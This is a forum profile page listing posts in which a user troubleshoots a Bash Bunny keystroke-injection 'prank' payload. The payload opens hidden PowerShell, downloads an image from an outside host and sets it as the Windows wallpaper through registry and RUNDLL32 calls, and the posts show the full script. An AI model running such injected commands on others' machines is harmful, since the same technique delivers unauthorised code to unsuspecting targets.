Jump to content

Dragus

Members
  • Content Count

    5
  • Joined

  • Last visited

About Dragus

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. I forgot to add context in my last post. I thought about using DUCKY_LANG, but my keyboard (and most people here) does not follow 2-letter country codes. Here's one of mine (the one I use the most): https://prnt.sc/ml9yya Is there a way for the Bash Bunny to automatically adapt to the target's environment? (the windows' current keyboard)
  2. `Thanks! That helped me find the reason for my next problem. Here is what it really writes in the command prompt: powershell -w h `$p=$home+`<z.jpg`;iwr https:ééwww.magikweb.caéz.jpg -O $p;SP `HKCU:Control Panel<Desktop`WallPaper $p;1..29>%^RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1¨pause That's really messy. It seems like it's assuming I have a US English keyboard. Is that a common issue? I would think a lot of non-US countries' users would have a similar issue.
  3. Here's a follow-up! I think there's a typo on the YouTube video or Github, not sure from where yet. There was an unescaped quote at the end of the line. This works "better": LED SETUP ATTACKMODE HID LED ATTACK Q GUI r Q DELAY 1000 Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\"" Q ENTER Now the result is that I see Powershell open up and close right away. I'm not sure if it's the normal behavior since there are many variations of this prank script. (if someone knows, enlight me) Also, that's me being slightly lazy, but in this script's context, what would the variable $home typically point to? I wanna debug further and try to find the image. Finally, do you think that the image fetching follows the URL (there are redirections)? Or it fails because the first answer wasn't HTTP 200? Thank you for any ideas, I'm happy I progressed!
  4. I tried it, Windows + R opens the command prompt with "cmd" written in it. It's the same thing I see when executing the payload, but after that, no text is written. I'll try a payload to only write text and see from there (it'll take a while so I learn the basics furthermore), it's a good idea since it would isolate the issue. Thanks for the reply!
  5. Hello everyone, I've been fiddling with multiple payloads for a while on multiple computers. I've seen various results (depending on the PC) and got very close (I think) to make a few of the payloads work properly after changing their configuration. One I'd like to get working for a starter is the Wallpaper Changer of Doom . It's not related to that specific payload, but on the Windows 7 computer, it opens the command prompt (with "CMD" in it) and nothing happens. The first time I plugged it in, it installed a driver (from Windows) for a few minutes. I think it's an issue related to Quack (typing characters), here's what I got so far: LED SETUP ATTACKMODE HID LED ATTACK Q GUI r Q DELAY 1000 Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"" Q ENTER It seems to be blinking yellow from that point. Any idea how I could debug this?
×
×
  • Create New...